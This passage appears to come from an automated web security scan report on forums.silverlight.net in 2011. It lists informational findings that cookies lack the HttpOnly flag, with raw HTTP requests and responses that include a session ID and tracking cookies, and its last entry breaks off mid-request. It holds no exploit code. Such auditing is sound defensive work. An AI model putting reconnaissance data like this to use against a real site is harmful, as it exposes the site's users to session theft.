<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
WCF RI
...[SNIP]...

17.180. http://forums.silverlight.net/forums/56.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/56.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:48 GMT; expires=Sun, 29-Jan-2012 23:18:48 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/56.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 61545
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:48 GMT; expires=Sun, 29-Jan-2012 23:18:48 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:49 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Jobs :
...[SNIP]...

17.181. http://forums.silverlight.net/forums/59.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/59.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:30 GMT; expires=Sun, 29-Jan-2012 23:17:30 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:30 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/59.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73671
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:30 GMT; expires=Sun, 29-Jan-2012 23:17:30 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:30 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silver
...[SNIP]...

17.182. http://forums.silverlight.net/forums/63.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/63.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:04 GMT; expires=Sun, 29-Jan-2012 23:18:04 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:05 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/63.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 71202
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:04 GMT; expires=Sun, 29-Jan-2012 23:18:04 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:05 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silver
...[SNIP]...

17.183. http://forums.silverlight.net/forums/64.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/64.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:48 GMT; expires=Sun, 29-Jan-2012 23:17:48 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/64.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 71929
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:48 GMT; expires=Sun, 29-Jan-2012 23:17:48 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:48 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
MVVM /
...[SNIP]...

17.184. http://forums.silverlight.net/forums/65.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/65.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:42 GMT; expires=Sun, 29-Jan-2012 23:17:43 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:43 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/65.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 64898
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:42 GMT; expires=Sun, 29-Jan-2012 23:17:43 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:43 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Manage
...[SNIP]...

17.185. http://forums.silverlight.net/forums/66.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/66.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:05 GMT; expires=Sun, 29-Jan-2012 23:18:05 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/66.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 65198
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:05 GMT; expires=Sun, 29-Jan-2012 23:18:05 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:06 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Silver
...[SNIP]...

17.186. http://forums.silverlight.net/forums/67.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/67.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:43 GMT; expires=Sun, 29-Jan-2012 23:17:43 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:43 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/67.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 65193
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:43 GMT; expires=Sun, 29-Jan-2012 23:17:43 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:43 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Perfor
...[SNIP]...

17.187. http://forums.silverlight.net/forums/68.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/68.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:58 GMT; expires=Sun, 29-Jan-2012 23:17:58 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/68.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76391
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:58 GMT; expires=Sun, 29-Jan-2012 23:17:58 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
PivotV
...[SNIP]...

17.188. http://forums.silverlight.net/forums/TopicsNotAnswered.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/TopicsNotAnswered.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:39 GMT; expires=Sun, 29-Jan-2012 23:20:39 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/TopicsNotAnswered.aspx?ForumID=-1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

17.189. http://forums.silverlight.net/forums/p/217026/518297.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217026/518297.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:38 GMT; expires=Sun, 29-Jan-2012 23:20:38 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217026/518297.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 107413
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:38 GMT; expires=Sun, 29-Jan-2012 23:20:38 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Elemen
...[SNIP]...

17.190. http://forums.silverlight.net/forums/p/217498/518305.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217498/518305.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:55 GMT; expires=Sun, 29-Jan-2012 23:19:55 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217498/518305.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 58467
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:55 GMT; expires=Sun, 29-Jan-2012 23:19:55 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:55 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
MVVM a
...[SNIP]...

17.191. http://forums.silverlight.net/forums/p/217562/518302.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217562/518302.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:16 GMT; expires=Sun, 29-Jan-2012 23:20:16 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217562/518302.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 31591
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:16 GMT; expires=Sun, 29-Jan-2012 23:20:16 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:16 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Self-R
...[SNIP]...

17.192. http://forums.silverlight.net/forums/p/217667/518301.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.silverlight.net
Path:	/forums/p/217667/518301.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:17 GMT; expires=Sun, 29-Jan-2012 23:20:17 GMT; path=/
CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/p/217667/518301.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
